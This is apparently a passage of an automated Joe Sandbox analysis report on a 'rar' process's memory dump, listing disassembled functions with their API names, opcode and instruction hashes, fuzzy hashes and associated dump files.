                                                                                                                                                                      • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                      • Instruction Fuzzy Hash: 86E02B22B3445146DFD89719D495FAD2391EF64B80F812035F44FC3A54ED5EC454CB05
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE794A74 Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastPrivilegeRelease
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1334314998-0
                                                                                                                                                                      • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                      • Instruction ID: 4c4b8bc472ade058ca5e5ac8b74dda2bda1173c3dfba63268fdc0b0e5d4a4795
                                                                                                                                                                      • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                      • Instruction Fuzzy Hash: 0FE04F73E1918342FF1497B2D4443741291AF64745F474434F90DCA255FEAFA4A1C24E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE7771FC Relevance: 1.9, APIs: 1, Instructions: 353COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7b45582bae7dd69f792145e90e6da2b9b411708c317b45820f8f66ef8b840033
                                                                                                                                                                      • Instruction ID: b4c118e172428d0edd128365f40e121a13f162b0efa7ae5a548345e38dd4265c
                                                                                                                                                                      • Opcode Fuzzy Hash: 7b45582bae7dd69f792145e90e6da2b9b411708c317b45820f8f66ef8b840033
                                                                                                                                                                      • Instruction Fuzzy Hash: D7E1D423A0C68241FF209A20D4443B92751EF61B8BF064135FE4DCB7DADEAEA475C71A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE7372C4 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c86521b1d8875bcba69ce37d260f22ca13c49f0672248d2e89784453983af802
                                                                                                                                                                      • Instruction ID: 17408bd306b60f89a47a448866f862f313a4647931594f6bd873ddc025782545
                                                                                                                                                                      • Opcode Fuzzy Hash: c86521b1d8875bcba69ce37d260f22ca13c49f0672248d2e89784453983af802
                                                                                                                                                                      • Instruction Fuzzy Hash: 6B514973528BD195EB009F24E8442ED37A8F754F88F19423AEB884B79ADF795061C336
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE79231C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                      • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                      • Instruction ID: d65239e719089890ac6bffecdb56db627a600ed8224b913e1bb595770a05a88c
                                                                                                                                                                      • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                      • Instruction Fuzzy Hash: C6416023A0968382FF68AB65E4503782251AFA0744F074439F90D877A5DFBFE865C74A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE798050 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 81a00aba03bed044d944170de60365d76bbe78fde453a36ffdf0bcb9fcb17f33
                                                                                                                                                                      • Instruction ID: f18c15483cc413971633b5fb48657849badcdfc1286ceba483c6131a03b54d00
                                                                                                                                                                      • Opcode Fuzzy Hash: 81a00aba03bed044d944170de60365d76bbe78fde453a36ffdf0bcb9fcb17f33
                                                                                                                                                                      • Instruction Fuzzy Hash: C911293391C68682FB109B94F54073962A4EF61380F570135F68D87696DFBFE860CB0A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE744D1C Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CommandLine
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3253501508-0
                                                                                                                                                                      • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                      • Instruction ID: 4423f8439d0b3dbd561244a2335d0a2bc6674b2e1e27077b4171d3717c47cbb8
                                                                                                                                                                      • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                      • Instruction Fuzzy Hash: 2C01C81360C94245EF10B716E40037D5661BF65794F4A0432FF4D47365EE7ED4A2D70A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE794B8C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: cd8da7e225d4e054d7198354b045464c529c48aefb4b06018a4c08b75c41078c
                                                                                                                                                                      • Instruction ID: 38ad4a5b2a2b56bb81771ecbf8277686d1cd7f2294f7cf6b43f07f37954ae7c1
                                                                                                                                                                      • Opcode Fuzzy Hash: cd8da7e225d4e054d7198354b045464c529c48aefb4b06018a4c08b75c41078c
                                                                                                                                                                      • Instruction Fuzzy Hash: A1018C23A0C6C240FF24A666D68037911905F65BD0F0B8230FD1DC62D6FD9FA4A1C20E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE794B14 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: c516406bf9b650796cf782c2d93797a14115aaa58b2b73e6f8591929e1e8cc7b
                                                                                                                                                                      • Instruction ID: c558df422494566a1d2e436d544b0384aa5352f731067b8dd3878b2c51e51bd1
                                                                                                                                                                      • Opcode Fuzzy Hash: c516406bf9b650796cf782c2d93797a14115aaa58b2b73e6f8591929e1e8cc7b
                                                                                                                                                                      • Instruction Fuzzy Hash: 4CF0AF36B0928341FF545665C5803B412801F68B80F4F5430E90DC67D1FE9FE8E0C21A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE754554 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                      • Opcode ID: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
                                                                                                                                                                      • Instruction ID: d066054e41a05b52b90582ff78c4a2aa5c00c55fd32fa14f73dd02e8fb1c9ae1
                                                                                                                                                                      • Opcode Fuzzy Hash: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
                                                                                                                                                                      • Instruction Fuzzy Hash: 95F062229082C146DF119B71D1013E82750AB16BF8F094335EE7D4B2DBDE9A90E8D726
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE794AB4 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                      • Instruction ID: ae1e11f1a249179eb4cea01df51bf038c6731de4e1581dd11e5a63f5a7507fff
                                                                                                                                                                      • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                      • Instruction Fuzzy Hash: 51F03033A4928240FF549A61D48137512809F647A0F4B0631FD2DC92C1FEDFE4A1C11E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE751930 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                                      • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                      • Instruction ID: 162ec28e31be48cd05ca75872792035eb19b0d64ab063ec618e2acd9a63a9018
                                                                                                                                                                      • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                      • Instruction Fuzzy Hash: 43F02863A08BC295FF248B20E0403B43251DB20B79F5A5330E23D850D8CFA9C8B6C356
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE7638A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
